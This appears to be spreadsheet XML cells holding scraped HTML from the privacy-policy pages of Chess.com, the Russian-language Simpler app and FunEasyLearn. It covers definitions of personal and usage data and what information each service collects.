&lt;link rel="apple-touch-icon" sizes="180x180" href="/bundles/web/favicons/apple-touch-icon.f72d3fd3.png"&gt;
&lt;link rel="alternate icon" type="image/png" href="/bundles/web/favicons/favicon-32x32.c2a8280d.png"&gt;
&lt;link rel="icon" href="/bundles/web/favicons/favicon.11c6b6d5.svg" type="image/svg+xml"&gt;
      &lt;link href="/bundles/app/css/main.client.b457bb9d.css"
      type="text/css"
      rel="stylesheet" /&gt;
      &lt;link href="/bundles/app/css/sprites.client.7535f45a.css"
      type="text/css"
      rel="stylesheet" /&gt;
      &lt;link data-href="/bundles/app/css/alerts.client.a672ccf3.css"
      type="text/css"
      rel="stylesheet" /&gt;
      &lt;link href="/bundles/app/css/chess-ads.client.510fb775.css"
      type="text/css"
      rel="stylesheet" /&gt;
&lt;meta name="language-banner-styles" content="/bundles/app/css/language-banner.client.dcdb10f9.css"&gt;
&lt;meta name="language-banner-scripts" content="/bundles/app/js/language-banner.client.30361579.js"&gt;
      &lt;link href="/bundles/app/css/checkmate.client.69ec9a79.css"
      type="text/css"
      rel="stylesheet" /&gt;
      &lt;link href="/bundles/app/css/ready-to-play-banner.client.f50fbd17.css"
      type="text/css"
      rel="stylesheet" /&gt;
      &lt;link href="/bundles/app/css/navigation.client.623b4a11.css"
      type="text/css"
      rel="stylesheet" /&gt;
  &lt;link
    href="/bundles/app/css/navigation-footer.client.cda69242.css"
    type="text/css" rel="stylesheet" /&gt;
      &lt;link href="/bundles/app/css/content.client.23846b58.css"
      type="text/css"
      rel="stylesheet" /&gt;
      &lt;link href="/bundles/app/css/layout.client.a025acf4.css"
      type="text/css"
      rel="stylesheet" /&gt;
      &lt;link href="/bundles/app/css/policies.client.12ae2f22.css"
      type="text/css"
      rel="stylesheet" /&gt;
                &lt;meta name="theme-color" content="#312E2B" /&gt;
  &lt;title&gt;Privacy Policy - Chess.com&lt;/title&gt;
        &lt;link rel="alternate" href="https://www.chess.com/legal/privacy" hreflang="en" /&gt;&lt;link rel="alternate" href="https://www.chess.com/es/legal/privacy" hreflang="es" /&gt;&lt;link rel="alternate" href="https://www.chess.com/fr/legal/privacy" hreflang="fr" /&gt;&lt;link rel="alternate" href="https://www.chess.com/de/legal/privacy" hreflang="de" /&gt;&lt;link rel="alternate" href="https://www.chess.com/pl/legal/privacy" hreflang="pl" /&gt;&lt;link rel="alternate" href="https://www.chess.com/ru/legal/privacy" hreflang="ru" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://www.chess.com/sv/legal/privacy" hreflang="sv" /&gt;&lt;link rel="alternate" href="https://www.chess.com/el/legal/privacy" hreflang="el" /&gt;&lt;link rel="alternate" href="https://www.chess.com/pt/legal/privacy" hreflang="pt" /&gt;&lt;link rel="alternate" href="https://www.chess.com/it/legal/privacy" hreflang="it" /&gt;&lt;link rel="alternate" href="https://www.chess.com/zh/legal/privacy" hreflang="zh" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://www.chess.com/ja/legal/privacy" hreflang="ja" /&gt;&lt;link rel="alternate" href="https://www.chess.com/ko/legal/privacy" hreflang="ko" /&gt;&lt;link rel="alternate" href="https://www.chess.com/nl/legal/privacy" hreflang="nl" /&gt;&lt;link rel="alternate" href="https://www.chess.com/hy/legal/privacy" hreflang="hy" /&gt;&lt;link rel="alternate" href="https://www.chess.com/bg/legal/privacy" hreflang="bg" /&gt;&lt;link rel="alternate" href="https://www.chess.com/hr/legal/privacy" hreflang="hr" /&gt;&lt;link rel="alternate" href="https://www.chess.com/cs/legal/privacy" hreflang="cs" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://www.chess.com/da/legal/privacy" hreflang="da" /&gt;&lt;link rel="alternate" href="https://www.chess.com/fi/legal/privacy" hreflang="fi" /&gt;&lt;link rel="alternate" href="https://www.chess.com/hu/legal/privacy" hreflang="hu" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://www.chess.com/lt/legal/privacy" hreflang="lt" /&gt;&lt;link rel="alternate" href="https://www.chess.com/no/legal/privacy" hreflang="no" /&gt;&lt;link rel="alternate" href="https://www.chess.com/ro/legal/privacy" hreflang="ro" /&gt;&lt;link rel="alternate" href="https://www.chess.com/sk/legal/privacy" hreflang="sk" /&gt;&lt;link rel="alternate" href="https://www.chess.com/sl/legal/privacy" hreflang="sl"</t>
  </si>
  <si>
    <t>/&gt;&lt;link rel="alternate" href="https://www.chess.com/tr/legal/privacy" hreflang="tr" /&gt;&lt;link rel="alternate" href="https://www.chess.com/uk/legal/privacy" hreflang="uk" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://www.chess.com/af/legal/privacy" hreflang="af" /&gt;&lt;link rel="alternate" href="https://www.chess.com/ar/legal/privacy" hreflang="ar" /&gt;&lt;link rel="alternate" href="https://www.chess.com/az/legal/privacy" hreflang="az" /&gt;&lt;link rel="alternate" href="https://www.chess.com/be/legal/privacy" hreflang="be" /&gt;&lt;link rel="alternate" href="https://www.chess.com/bs/legal/privacy" hreflang="bs" /&gt;&lt;link rel="alternate" href="https://www.chess.com/et/legal/privacy" hreflang="et" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://www.chess.com/fa/legal/privacy" hreflang="fa" /&gt;&lt;link rel="alternate" href="https://www.chess.com/gl/legal/privacy" hreflang="gl" /&gt;&lt;link rel="alternate" href="https://www.chess.com/he/legal/privacy" hreflang="he" /&gt;&lt;link rel="alternate" href="https://www.chess.com/hi/legal/privacy" hreflang="hi" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://www.chess.com/id/legal/privacy" hreflang="id" /&gt;&lt;link rel="alternate" href="https://www.chess.com/is/legal/privacy" hreflang="is" /&gt;&lt;link rel="alternate" href="https://www.chess.com/ka/legal/privacy" hreflang="ka" /&gt;&lt;link rel="alternate" href="https://www.chess.com/lv/legal/privacy" hreflang="lv" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://www.chess.com/ms/legal/privacy" hreflang="ms" /&gt;&lt;link rel="alternate" href="https://www.chess.com/pt-BR/legal/privacy" hreflang="pt-BR" /&gt;&lt;link rel="alternate" href="https://www.chess.com/sq/legal/privacy" hreflang="sq" /&gt;&lt;link rel="alternate" href="https://www.chess.com/sr/legal/privacy" hreflang="sr" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://www.chess.com/vi/legal/privacy" hreflang="vi" /&gt;&lt;link rel="alternate" href="https://www.chess.com/zh-HK/legal/privacy" hreflang="zh-HK" /&gt;&lt;link rel="alternate" href="https://www.chess.com/zh-TW/legal/privacy" hreflang="zh-TW" /&gt;&lt;link rel="alternate" href="https://www.chess.com/fil/legal/privacy" hreflang="fil" /&gt;&lt;link rel="alternate" href="https://www.chess.com/nl-BE/legal/privacy" hreflang="nl-BE" /&gt;&lt;link rel="alternate" href="https://www.chess.com/bn/legal/privacy" hreflang="bn" /&gt;&lt;link rel="alternate" href="https://www.chess.com/tk/legal/privacy" hreflang="tk" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://www.chess.com/uz/legal/privacy" hreflang="uz" /&gt;&lt;link rel="alternate" href="https://www.chess.com/ca/legal/privacy" hreflang="ca" /&gt;&lt;link rel="alternate" href="https://www.chess.com/ur/legal/privacy" hreflang="ur" /&gt;  
        &lt;link rel="canonical" href="https://www.chess.com/legal/privacy"&gt;
    &lt;link rel="manifest" href="/manifest.json" crossorigin="use-credentials"&gt;
      &lt;script&gt;
      window.dataLayer = window.dataLayer || [];
      function gtag(){ dataLayer.push(arguments); }
      (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-WQJVC73');&lt;/script&gt;
  &lt;script&gt;
window.chesscom</t>
  </si>
  <si>
    <t>&lt;a
    class="mobile-auth-action ui_v5-button-component ui_v5-button-primary ui_v5-button-x-small login"
    href="https://www.chess.com/login_and_go?returnUrl=https://www.chess.com/legal/privacy"
    rel="nofollow"
    title="Log In"&gt;
    Log In
  &lt;/a&gt;
&lt;/div&gt;
      &lt;/header&gt;
  &lt;main class="layout-component  "&gt;
          &lt;header class="layout-title "&gt;
          &lt;h1 class="v5-title"&gt;
      Privacy Policy
  &lt;/h1&gt;
      &lt;/header&gt;
    &lt;div
      id="vue-instance"
      class="layout-column-one"
      &gt;
        &lt;section class="v5-section" dir="ltr"&gt;
    &lt;div class="v5-section-content-wide policies-content"&gt;
&lt;div class="policies-effective-date"&gt;Effective date: November 18, 2022&lt;/div&gt;
&lt;p&gt;Chess.com, LLC (&amp;quot;us&amp;quot;, &amp;quot;we&amp;quot;, or &amp;quot;our&amp;quot;) operates the chess.com website, the chess.com mobile application, and a number of other websites and applications created and maintained by us (the “Service”).&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>This page informs you of our policies regarding the collection, use, and disclosure of personal data when you use our Service and the choices you have associated with that data. Our Privacy Policy is subject to our User Agreement and the other applicable agreements referenced therein.&lt;/p&gt;
&lt;p&gt; We use your data to provide and improve the Service.</t>
  </si>
  <si>
    <t>By using the Service, you agree to the collection and use of information in accordance with this policy. Unless otherwise defined in this Privacy Policy, terms used in this Privacy Policy have the same meanings as in our Terms and Conditions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;IMPORTANT NOTE TO RESIDENTS OF THE EUROPEAN UNION AND THE UNITED KINGDOM:&lt;/strong&gt; This privacy policy contains important information about your rights under the General Data Protection Regulation of the European Union and the equivalent laws of the United Kingdom (the “GDPR”).</t>
  </si>
  <si>
    <t>Please see our GDPR Notice below for more information about these rights.&lt;/p&gt;
&lt;p&gt;If you are subject to the General Data Protection Regulation (the “GDPR”), please see below for information regarding your right to exercise certain of your rights under the GDPR, including your “right to be forgotten.” If you are subject to the privacy laws of the State of California, including the California Consumer Privacy Act (the “CCPA”), please see below for information regarding your right to exercise certain of your rights under CCPA, including your right to instruct us not to sell your personal information.&lt;/p&gt;
&lt;h2
  class="policies-heading-item"
  id="definitions"&gt;
  &lt;span
    class="icon-font-chess policies-link-icon policies-icon link"
    &gt;&lt;/span&gt;
  Definitions
&lt;/h2&gt;
&lt;h3&gt;Service&lt;/h3&gt;
&lt;p&gt;Service means the Chess.com website and the Chess.com mobile application operated by Chess.com, LLC, and any other products or services that we extend through Chess.com or by other means. The Service does not include third-party content such as advertisements, or any other products or services offered by third parties.</t>
  </si>
  <si>
    <t>We do not and cannot control any third-party content, including user-generated content (for example, in-game chat content).&lt;/p&gt;
&lt;h3
  class="policies-heading-item"
  id="personal_data"&gt;
  &lt;span
    class="icon-font-chess policies-link-icon policies-icon link"
    &gt;&lt;/span&gt;
   Personal Data&lt;/h3&gt;
&lt;p&gt;Personal Data means data about a living individual who can be identified from that data (or from that and other information either in our possession or likely to come into our possession). Personal data may also include “pseudonymous” data, meaning information about you which cannot be used to identify you personally - for example, an IP address, or information about which country from which you log into Chess.com.</t>
  </si>
  <si>
    <t>For purposes of this Privacy Policy, all pseudonymous data is Personal Data to the extent that Chess.com is a data processor of pseudonymous data.&lt;/p&gt;
&lt;h3
  class="policies-heading-item"
  id="usage_data"&gt;
  &lt;span
    class="icon-font-chess policies-link-icon policies-icon link"
    &gt;&lt;/span&gt;
  Usage Data&lt;/h3&gt;
&lt;p&gt;Usage Data is data collected automatically either generated by the use of the Service or from the Service infrastructure itself (for example, the duration of a page visit). User Data may include pseudonymous data where applicable.&lt;/p&gt;
&lt;h3
  class="policies-heading-item"
  id="cookies"&gt;
  &lt;span
    class="icon-font-chess policies-link-icon policies-icon link"
    &gt;&lt;/span&gt;
   Cookies&lt;/h3&gt;
&lt;p&gt;Cookies are small pieces of data stored on your device (computer or mobile device).&lt;/p&gt;
&lt;h3&gt;Data Controller&lt;/h3&gt;
&lt;p&gt;Data Controller means the natural or legal person who (either alone or jointly or in common with other persons) determines the purposes for which and the manner in which any personal information is, or is to be, processed.</t>
  </si>
  <si>
    <t>For the purpose of this Privacy Policy, we are a Data Controller of your Personal Data and of your Usage Data.&lt;/p&gt;
&lt;h3&gt;Data Processors (or Service Providers)&lt;/h3&gt;
&lt;p&gt;Data Processor means any natural or legal person, including Service Providers, who processes the data on behalf of the Data Controller. We may use the services of various Data Processors in order to process your data more effectively. Any third party specifically referenced in this Privacy Policy, including Google (Alphabet, Inc.) and Facebook (Facebook, Inc., d/b/a Meta) is a third-party Data Processor within the meaning of this Privacy Policy.&lt;/p&gt;
&lt;h3&gt;Data Subject (or User)&lt;/h3&gt;
&lt;p&gt;Data Subject is any living individual who is using our Service and is the subject of Personal Data.&lt;/p&gt;
&lt;h2
  class="policies-heading-item"
  id="information_collection"&gt;
  &lt;span
    class="icon-font-chess policies-link-icon policies-icon link"
    &gt;&lt;/span&gt;
  Information Collection And Use
&lt;/h2&gt;
&lt;p&gt;We collect several different types of information for various purposes to provide and improve our Service to you.&lt;/p&gt;
&lt;h2
  class="policies-heading-item"
  id="types_of_data"&gt;
  &lt;span
    class="icon-font-chess policies-link-icon policies-icon link"
    &gt;&lt;/span&gt;
  Types of Data Collected
&lt;/h2&gt;
&lt;h3&gt;Personal Data&lt;/h3&gt;
&lt;p&gt;While using our Service, we may ask you to provide us with certain personally identifiable information that can be used to contact or identify you (&amp;quot;Personal Data&amp;quot;).</t>
  </si>
  <si>
    <t>Personally identifiable information may include, but is not limited to:&lt;/p&gt;
&lt;ul cl</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;meta charset="utf-8"/&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;meta name="viewport" content="target-densitydpi=device-dpi, width=device-width, user-scalable=yes"/&gt;
    &lt;meta name="format-detection" content="telephone=no"/&gt;
    &lt;meta name="theme-color" content="#ffffff"&gt;
    &lt;title&gt;Политика конфиденциальности Simpler&lt;/title&gt;
    &lt;!--&lt;link rel="icon" href="/img/favicon.png"&gt;--&gt;
    &lt;link rel="stylesheet" href="/css/index.css" type="text/css"/&gt;
    &lt;script type="text/javascript" src="/js/jquery.min.js"&gt;&lt;/script&gt;
    &lt;script&gt;
        function initSize() {
            var _delta;
            var contWidth = 640;
            if ($('html').hasClass('mobile') &amp;&amp; $(window).width() &gt; 640) {
                $('body').addClass('mobile-big');
                contWidth = 1080;
            }
            if ($(window).width() &gt; 320) {
                if ($(window).width() &gt; contWidth) {
                    _delta = '125%';
                    if ($('.iphone').size()) {
                        _delta = (($(window).width() / contWidth) * 125) + '%';
                    }
                } else {
                    _delta = (($(window).width() / contWidth) * 125) + '%';
                }
                $('html').css('font-size', _delta);
            } else {
                $('html').css('font-size', '64.0625%');
            }
        }
        $(document).ready(function () {
            initSize();
        });
    &lt;/script&gt;
    &lt;script type="text/javascript" src="/js/user.js"&gt;&lt;/script&gt;
&lt;/head&gt;
</t>
  </si>
  <si>
    <t>&lt;body&gt;
&lt;div id="wrapper"&gt;
    &lt;div id="main_wrap"&gt;
        &lt;div class="container" id="100vh" style="min-height: 100vh; display: -webkit-box; display: -moz-box; display: -ms-flexbox; display: -webkit-flex; display:flex; flex-direction:column;"&gt;
            &lt;section class="text-section"&gt;
                &lt;div class="content-holder"&gt;
                    &lt;h2 class="blue"&gt;Политика конфиденциальности Simpler&lt;/h2&gt;
                    &lt;p&gt;
                        Условие конфиденциальности распространяется на всю ту информацию, которую ООО «Гудвас» (далее, Гудвас) может получить о пользователе во время использования им приложения «Simpler» (далее, Приложения) и которая может быть соотнесена с данным конкретным пользователем.
                     &lt;/p&gt;
                    &lt;h3 class="blue"&gt;Получение и использование персональной информации&lt;/h3&gt;
                    &lt;p&gt;
                        Гудвас получает персональную информацию о Вас, когда Вы используете Приложение.
                     &lt;/p&gt;
                    &lt;p&gt;
                        Когда Вы регистрируетесь в Приложении, Вы устанавливаете привязку аккаунта в</t>
  </si>
  <si>
    <t xml:space="preserve">Приложении и Вашей электронной почты. Гудвас сохраняет Ваш адрес электронной почты, указанный вами в Приложении, и результаты выполнения вами заданий в рамках программы обучения английскому языку.
                     &lt;/p&gt;
                    &lt;p&gt;
                        Приложение автоматически получает и может записывать в серверные журналы техническую информацию из Приложения: IP адрес, версию Приложения, версию операционной системы, дату и время сессий.
                    </t>
  </si>
  <si>
    <t>&lt;/p&gt;
                    &lt;p&gt;
                        Эта информация используется только для обеспечения работоспособности приложения и оперативного решения проблем.&lt;/p&gt;
                     &lt;p&gt;
                        Всю полученную информацию Гудвас использует с одной основной целью: сделать Приложение максимально удобным и полезным для Вас.
                     &lt;/p&gt;
                    &lt;h3 class="blue"&gt;Использование</t>
  </si>
  <si>
    <t xml:space="preserve">и раскрытие персональной информации&lt;/h3&gt;
                    &lt;p&gt;
                        Гудвас никому не продает и не разглашает персональную информацию о пользователях. Гудвас вправе передать персональную информацию о Пользователе третьим лицам только в том случае, если:
                     &lt;/p&gt;
                    &lt;ul&gt;
                        &lt;li&gt;
                            Вы изъявили письменное желание раскрыть эту информацию.
                        </t>
  </si>
  <si>
    <t>&lt;/li&gt;
                        &lt;li&gt;
                            Это предусмотрено действующим законодательством РФ.
                         &lt;/li&gt;
                    &lt;/ul&gt;
                    &lt;h3 class="blue"&gt;Возможность редактировать информацию и персональные настройки&lt;/h3&gt;
                    &lt;p&gt;
                         Приложение не предоставляет Пользователям возможность изменить свой адрес электронной почты.</t>
  </si>
  <si>
    <t xml:space="preserve">Пройти авторизацию под другим электронным адресом возможно путем переустановки Приложения и прохождения повторной процедуры регистрации.
                     &lt;/p&gt;
                &lt;/div&gt;
            &lt;/section&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;title&gt;Privacy Policy - FunEasyLearn&lt;/title&gt;&lt;meta name="description" content="The FunEasyLearn Privacy Policy explains how we collect, use and protect your data."/&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:title" content="Privacy Policy - FunEasyLearn"/&gt;&lt;meta property="og:description" content="The FunEasyLearn Privacy Policy explains how we collect, use and protect your data."/&gt;&lt;meta property="twitter:title" content="Privacy Policy - FunEasyLearn"/&gt;&lt;meta property="twitter:description" content="The FunEasyLearn Privacy Policy explains how we collect, use and protect your data. "/&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"/&gt;&lt;meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/&gt;&lt;meta http-equiv="X-UA-Compatible" content="ie=edge"/&gt;&lt;link rel="stylesheet" href="https://www.funeasylearn.com/static/css/style.css"/&gt;&lt;link rel="stylesheet" href="https://www.funeasylearn.com/static/fonts/index.css"/&gt;&lt;link rel="stylesheet" href="//cdn.jsdelivr.net/gh/kenwheeler/slick@1.8.1/slick/slick.css"/&gt;&lt;link rel="stylesheet" href="//cdn.jsdelivr.net/gh/kenwheeler/slick@1.8.1/slick/slick-theme.css"/&gt;&lt;link rel="shortcut icon" href="https://www.funeasylearn.com/static/favicon.ico"/&gt;&lt;meta name="twitter:site" content="@FunEasyLearn"/&gt;&lt;meta name="twitter:card" content="summary"/&gt;&lt;meta property="og:url" content="https://www.funeasylearn.com/privacy"/&gt;&lt;meta property="og:image" content="https://www.funeasylearn.com/static/imgs/img/og-image.png"/&gt;&lt;meta property="og:site_name" content="FunEasyLearn"/&gt;&lt;meta property="og:type" content="website"/&gt;&lt;link rel="alternate" hreflang="en" href="https://www.funeasylearn.com/privacy"/&gt;&lt;link rel="alternate" hreflang="fr" href="https://fr.funeasylearn.com/privacy"/&gt;&lt;link rel="alternate" hreflang="de" href="https://de.funeasylearn.com/privacy"/&gt;&lt;link rel="alternate" hreflang="it" href="https://it.funeasylearn.com/privacy"/&gt;&lt;link rel="alternate" hreflang="pt" href="https://pt.funeasylearn.com/privacy"/&gt;&lt;link rel="alternate" hreflang="ro" href="https://ro.funeasylearn.com/privacy"/&gt;&lt;link rel="alternate" hreflang="ru" href="https://ru.funeasylearn.com/privacy"/&gt;&lt;link rel="alternate" hreflang="es" href="https://es.funeasylearn.com/privacy"/&gt;&lt;link rel="canonical" href="https://www.funeasylearn.com/privacy" id="canonical"/&gt;&lt;!-- google tag manager--&gt;&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-TX6GBK2');&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;!-- google tag manager--&gt;&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TX6GBK2" height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;&lt;nav class="d-flex align-items-center" id="nav"&gt;&lt;a</t>
  </si>
  <si>
    <t>href="/"&gt;&lt;img class="logo" src="https://www.funeasylearn.com/static/imgs/img/navLogo.png" alt="FunEasyLearn logo"/&gt;&lt;/a&gt;&lt;div class="ml-auto"&gt;&lt;/div&gt;&lt;div class="left-block b2b mr-60 text-4 d-xl-flex d-none"&gt;&lt;a href="/schools" style="color: #000000 ! important"&gt;For Schools &lt;/a&gt;&lt;div class="mr-30"&gt;&lt;/div&gt;&lt;a href="/business" style="color: #000000 !</t>
  </si>
  <si>
    <t>important"&gt;For Business &lt;/a&gt;&lt;/div&gt;&lt;div class="left-block d-flex align-items-center"&gt;&lt;div class="expand text-4 d-none d-lg-block"&gt;Site language:&lt;button class="select-lang"&gt;English&lt;div class="svg-from-data" data="https://www.funeasylearn.com/static/imgs/svg/expand.svg" data-class="expand"&gt;&lt;/div&gt;&lt;/button&gt;&lt;/div&gt;&lt;button class="ham"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class="side-menu"&gt;&lt;button class="side-menu--close"&gt;Close&lt;/button&gt;&lt;div class="select-lang d-lg-none"&gt;&lt;span&gt;&lt;span&gt;Site language:&amp;nbsp&lt;/span&gt; English&lt;/span&gt;&lt;/div&gt;&lt;a href="/courses"&gt;Languages&lt;/a&gt;&lt;a href="https://app.funeasylearn.com/premium"&gt;Premium&lt;/a&gt;&lt;!-- b2b--&gt;&lt;a class="d-xl-none" href="/schools"&gt;For Schools&lt;/a&gt;&lt;a class="d-xl-none" href="/business"&gt;For Business&lt;/a&gt;&lt;!-- b2b--&gt;&lt;a href="/press"&gt;Press&lt;/a&gt;&lt;a href="https://support.funeasylearn.com"&gt;Support&lt;/a&gt;&lt;a href="/contact"&gt;Contact us&lt;/a&gt;&lt;button class="side-menu--download"&gt;&lt;div class="download-btn" data="google"&gt;&lt;a href="https://fel.page.link/android" target="_blank"&gt;&lt;img src="https://www.funeasylearn.com/static/imgs/svg/google_store_logo.svg" alt="Google Play logo"/&gt;&lt;div class="text"&gt;&lt;span&gt;Get it on&lt;/span&gt;&lt;span&gt; Google Play&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;/button&gt;&lt;button class="side-menu--download"&gt;&lt;div class="download-btn" data="apple"&gt;&lt;a href="https://fel.page.link/ios" target="_blank"&gt;&lt;img src="https://www.funeasylearn.com/static/imgs/svg/app_store_logo.svg" alt="Apple logo"/&gt;&lt;div class="text"&gt;&lt;span&gt;Download on the&lt;/span&gt;&lt;span&gt;App Store&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class="nav-drop-down"&gt;&lt;div class="nav-drop-down__wrapper</t>
  </si>
  <si>
    <t>d-flex flex-column"&gt;&lt;a class="mb-20" href="https://de.funeasylearn.com"&gt;&lt;div class="flag"&gt; &lt;img src="https://www.funeasylearn.com/static/imgs/img/flags/24.png" alt="Deutsch"/&gt;&lt;span&gt;Deutsch&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;a class="mb-20" href="https://www.funeasylearn.com"&gt;&lt;div class="flag"&gt; &lt;img src="https://www.funeasylearn.com/static/imgs/img/flags/16.png" alt="English"/&gt;&lt;span&gt;English&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;a class="mb-20" href="https://es.funeasylearn.com"&gt;&lt;div class="flag"&gt; &lt;img src="https://www.funeasylearn.com/static/imgs/img/flags/53.png" alt="Español"/&gt;&lt;span&gt;Español&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;a class="mb-20" href="https://fr.funeasylearn.com"&gt;&lt;div class="flag"&gt; &lt;img src="https://www.funeasylearn.com/static/imgs/img/flags/21.png" alt="Français"/&gt;&lt;span&gt;Français&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;a class="mb-20" href="https://it.funeasylearn.com"&gt;&lt;div class="flag"&gt; &lt;img src="https://www.funeasylearn.com/static/imgs/img/flags/34.png" alt="Italiano"/&gt;&lt;span&gt;Italiano&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;a class="mb-20" href="https://pt.funeasylearn.com"&gt;&lt;div class="flag"&gt; &lt;img src="https://www.funeasylearn.com/static/imgs/img/flags/47.png" alt="Português"/&gt;&lt;span&gt;Português&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;a class="mb-20" href="https://ro.funeasylearn.com"&gt;&lt;div class="flag"&gt; &lt;img src="https://www.funeasylearn.com/static/imgs/img/flags/48.png" alt="Română"/&gt;&lt;span&gt;Română&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;a class="mb-20" href="https://ru.funeasylearn.com"&gt;&lt;div class="flag"&gt; &lt;img src="https://www.funeasylearn.com/static/imgs/img/flags/49.png" alt="Русский"/&gt;&lt;span&gt;Русский&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;button class="close"&gt; &lt;div class="ham"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="txt"&gt;Close&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;/nav&gt;&lt;div id="privacy"&gt;&lt;section class="intro pb-30"&gt;&lt;div class="wrapper"&gt;&lt;h2 class="text-1 text-center"&gt;Privacy Policy&lt;/h2&gt;&lt;/div&gt;&lt;/section&gt;&lt;section class="s1"&gt;&lt;div class="wrapper"&gt;&lt;p class="text-4"&gt; &lt;span&gt;FunEasyLearn is committed to protecting your privacy. This Privacy Policy explains how we collect, use, disclose, and safeguard your personal information when you use the FunEasyLearn mobile application (“the App”). We will only use the information that we collect about you in accordance with the applicable privacy laws including but not limited to the EU General Data Protection Regulation 2016/679 (“GDPR”), California Online Privacy Protection Act (“CalOPPA”) and Children's Online Privacy Protection Act (“COPPA”).</t>
  </si>
  <si>
    <t>We reserve the right to update and modify this Privacy Policy at any time and for any reason. You are encouraged to periodically review this Privacy Policy to stay informed of updates. &lt;/span&gt;&lt;span class="bold"&gt;IF</t>
  </si>
  <si>
    <t xml:space="preserve">YOU DO NOT AGREE WITH THE TERMS OF THIS PRIVACY POLICY, YOU ARE ADVISED NOT TO CONTINUE USING THE APP ANY LONGER.&lt;/span&gt;&lt;/p&gt;&lt;h3 class="text-2 bold"&gt;1.&amp;nbsp; WHAT INFORMATION DO WE COLLECT?&lt;/h3&gt;&lt;p class="text-3 bold" style="font-size:24px"&gt;a. Personal information you disclose to us&lt;/p&gt;&lt;p class="text-4"&gt;&lt;i&gt;&lt;span&gt; &lt;b&gt;Summary:&lt;/b&gt;&amp;nbsp; We collect personal information that you voluntarily provide to us by registering on the App, expressing an interest in obtaining information about us or our services, or otherwise contacting us.      </t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/i&gt;&lt;span&gt; &lt;b&gt;Personal Information Provided by You.&lt;/b&gt;&amp;nbsp; The personal information that we collect depends on the context of your interactions with us, the choices you make, and the products and features you use. All personal information that you provide to us must be true, complete, and accurate, and you must notify us of any changes to such personal information. The personal information we collect may include the following:&lt;/span&gt;&lt;span style="margin-left:10px"&gt;• Your full name&lt;/span&gt;&lt;span style="margin-left:10px"&gt;• Your email address&lt;/span&gt;&lt;span style="margin-left:10px"&gt;• Your social media account login information&lt;/span&gt;&lt;span style="margin-left:10px"&gt;• Your username(s) in such social media&lt;/span&gt;&lt;span style="margin-left:10px"&gt;• Your username on the App&lt;/span&gt;&lt;span style="margin-left:10px"&gt;• Your password(s) on the App&lt;/span&gt;&lt;span style="margin-left:10px"&gt;• Your profile photo, if any&lt;/span&gt;&lt;span&gt;&lt;b&gt;Sensitive Information.&lt;/b&gt;&amp;nbsp; When necessary, with your consent or as otherwise permitted by applicable law, we process the following categories of sensitive information:&lt;/span&gt;&lt;span</t>
  </si>
  <si>
